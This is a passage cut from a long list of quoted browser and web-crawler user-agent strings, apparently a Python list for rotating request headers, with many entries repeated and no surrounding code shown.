(Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)', 'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)', 'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16', 'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13', 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57', 'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0', 'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g', 'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125', 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)', 'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)', 'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)', 'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0', 'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)', 'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16', 'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)', 'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7', 'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0', 'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)', 'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)', 'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)', 'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10', 'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)', 'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007', 'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179', 'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com', 'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)', 'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)', 'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)', 'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 